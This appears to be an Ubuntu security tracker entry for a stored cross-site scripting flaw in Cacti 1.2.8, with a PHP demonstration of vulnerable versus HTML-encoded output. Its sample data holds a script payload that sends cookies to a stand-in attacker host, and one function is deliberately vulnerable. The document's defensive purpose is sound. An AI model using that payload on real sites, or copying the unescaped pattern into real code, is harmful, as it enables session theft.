Candidate: CVE-2020-7106
PublicDate: 2020-01-16 04:15:00 UTC
References:
 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7106
 https://github.com/Cacti/cacti/issues/3191
Description:
 Cacti 1.2.8 has stored XSS in data_sources.php, color_templates_item.php,
 graphs.php, graph_items.php, lib/api_automation.php, user_admin.php, and
 user_group_admin.php, as demonstrated by the description parameter in
 data_sources.php (a raw string from the database that is displayed by
 $header to trigger the XSS).
Ubuntu-Description:
 It was discovered that Cacti did not properly escape certain stored values
 before displaying them in web pages, resulting in stored cross-site
 scripting (XSS). An attacker with access to set those values could use this
 vulnerability to execute arbitrary script in the browser of any user who
 viewed the affected pages.
Notes:
Mitigation:
Bugs:
Priority: medium
Discovered-by:
Assigned-to:
CVSS:
 nvd: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N [6.1 MEDIUM]

Patches_cacti:
 upstream: https://github.com/Cacti/cacti/commit/4cbb045e03ee20a2bd09094a201a925fbb8a39d9
upstream_cacti: released (1.2.9)
precise/esm_cacti: DNE
trusty_cacti: ignored (out of standard support)
trusty/esm_cacti: DNE
xenial_cacti: ignored (end of standard support, was needed)
bionic_cacti: needed
disco_cacti: ignored (reached end-of-life)
eoan_cacti: ignored (reached end-of-life)
focal_cacti: not-affected (1.2.9+ds1-1ubuntu1)
groovy_cacti: not-affected (1.2.9+ds1-1ubuntu1)
hirsute_cacti: not-affected (1.2.9+ds1-1ubuntu1)
impish_cacti: not-affected (1.2.9+ds1-1ubuntu1)
jammy_cacti: not-affected (1.2.9+ds1-1ubuntu1)
devel_cacti: not-affected (1.2.9+ds1-1ubuntu1)
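The bug class described above (a string read back from the database and interpolated into a page header without HTML encoding) is illustrated below with an added, self-contained PHP example. It is not Cacti's code and not the upstream fix referenced in Patches_cacti; the function names (render_header_vulnerable, render_header_hardened, contains_raw_script), the generic header markup, and the sample rows are all hypothetical and constructed for the demonstration.

```php
<?php
// Added illustration of the stored-XSS pattern behind CVE-2020-7106.
// NOT Cacti's code and NOT the upstream patch: the function names, markup
// and sample data below are hypothetical and constructed for this demo.

// Constructed sample rows, standing in for records an attacker could have
// saved through the application's UI and that now live in the database.
function sample_rows(): array {
    return [
        ['id' => 1, 'description' => 'CPU load (5 min)'],
        ['id' => 2, 'description' => '<script>new Image().src="https://attacker.example/?c="+encodeURIComponent(document.cookie)</script>'],
    ];
}

// Vulnerable pattern: the raw value from the database is concatenated
// straight into HTML, so any markup it contains is parsed and executed by
// the browser of whoever views the page.
function render_header_vulnerable(array $row): string {
    $header = 'Data Source [edit: ' . $row['description'] . ']';
    return '<div class="header"><span>' . $header . '</span></div>';
}

// Hardened pattern: HTML-encode the untrusted value at the point of output.
// ENT_QUOTES also encodes single and double quotes, so the same helper is
// safe inside attribute values; ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of returning an empty string; the explicit charset
// avoids encoding mismatches that can defeat escaping.
function render_header_hardened(array $row): string {
    $safe   = htmlspecialchars((string) $row['description'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $header = 'Data Source [edit: ' . $safe . ']';
    return '<div class="header"><span>' . $header . '</span></div>';
}

// Simple regression check: does a raw <script tag from the stored value
// survive into the rendered HTML?
function contains_raw_script(string $html): bool {
    return stripos($html, '<script') !== false;
}

foreach (sample_rows() as $row) {
    $vuln = render_header_vulnerable($row);
    $hard = render_header_hardened($row);
    printf("row %d\n  vulnerable: %s\n  hardened:   %s\n  raw <script> present: vulnerable=%s hardened=%s\n\n",
        $row['id'], $vuln, $hard,
        contains_raw_script($vuln) ? 'yes' : 'no',
        contains_raw_script($hard) ? 'yes' : 'no');
}
```

Run with `php example.php`: for row 2 the vulnerable output contains the live `<script>` element, while the hardened output contains `&lt;script&gt;...&lt;/script&gt;`, which the browser shows as text. Encoding at output time is the right place for the fix because the same database value is rendered by several pages (the CVE lists seven affected files); filtering only at the input form would leave every other consumer exposed, and any value that entered the database before the filter was added would still fire.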